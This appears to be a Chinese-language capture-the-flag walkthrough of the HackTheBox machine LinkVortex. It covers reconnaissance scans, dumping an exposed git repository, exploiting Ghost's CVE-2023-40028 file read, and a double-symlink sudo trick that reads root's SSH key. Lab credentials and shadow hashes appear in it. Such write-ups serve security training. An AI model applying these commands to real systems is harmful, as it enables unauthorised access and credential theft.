基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -Pn 10.10.11.47
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-10 13:09 CST
Nmap scan report for 10.10.11.47
Host is up (0.077s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_  256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://linkvortex.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.83 seconds

80

需要加hosts:

1
10.10.11.47 linkvortex.htb

一个硬件相关的官网,右下角可以看到使用Ghost:

子域名扫描

子域名扫描发现dev:

1
2
3
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://linkvortex.htb/" -H 'Host: FUZZ.linkvortex.htb'  -fs 230

dev                     [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 82ms]

dev

访问是还没开放:

目录扫描

对dev进行目录扫描可以发现git泄漏,主站可以发现ghost登录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://dev.linkvortex.htb/

/.git                 (Status: 301) [Size: 239] [--> http://dev.linkvortex.htb/.git/]
/.hta                 (Status: 403) [Size: 199]
/.htaccess            (Status: 403) [Size: 199]
/.git/logs/           (Status: 200) [Size: 868]
/.git/HEAD            (Status: 200) [Size: 41]
/.htpasswd            (Status: 403) [Size: 199]
/.git/config          (Status: 200) [Size: 201]
/.git/index           (Status: 200) [Size: 707577]
/cgi-bin/             (Status: 403) [Size: 199]
/index.html           (Status: 200) [Size: 2538]
/server-status        (Status: 403) [Size: 199]

# 扫描选项,跟随重定向
ffuf -w ~/Tools/dict/SecLists/Discovery/Web-Content/raft-medium-directories.txt -u "http://linkvortex.htb/FUZZ" -r

ghost                   [Status: 200, Size: 3787, Words: 340, Lines: 65, Duration: 501ms]

git to ghost

所以就是常规的dump代码:

1
git-dumper http://dev.linkvortex.htb//.git/ dev_git

直接搜索密码得到的就是ghost登录密码:

1
2
admin@linkvortex.htb
OctopiFociPilfer45

CVE-2023-40028

后台查看版本可以知道是ghost 5.58.0,搜索到相关漏洞:

是一个任意文件读,前面git得到的文件中可以知道ghost是docker,并且可以看到配置文件路径:

所以读取配置文件,得到bob密码:

1
2
3
4
"auth": {
        "user": "bob@linkvortex.htb",
        "pass": "fibber-talented-worth"
        }

user flag

使用得到的bob账号密码ssh登录:

提权信息

可以sudo运行一个脚本,并且注意到会保留CHECK_CONTENT环境变量,然后会检查软链接的目标文件,通过检查后讲其移动到指定目录,如果指定了CHECK_CONTENT,会调用cat查看内容:

但可以注意到对敏感文件的检测只有一次,所以我们可以通过两层软链接来读取文件

提权 & root flag

所以就是两层软链接读取root私钥,登录:

1
2
3
ln -s /root/.ssh/id_rsa 2.png
ln -s /tmp/miao/2.png 1.png
CHECK_CONTENT=true sudo /usr/bin/bash /opt/ghost/clean_symlink.sh 1.png

shadow

1
2
root:$y$j9T$C3zg87gHwrCXO0vl4igIh/$iisf9sVwilKAi7mI5p1FqQslJWM9t2.YUWznIPC/XIA:19814:0:99999:7:::
bob:$6$rounds=656000$4p3mw8hAd9ir.25f$ocGm9nW1TM2AB8Z.l0K.hi43bOrm3oxQsaKFACMoS2UL.tIXxSW3u/xsClrvkEhP5s.GUpdIvCX3qRtppDV8r.:19814:0:99999:7:::

参考资料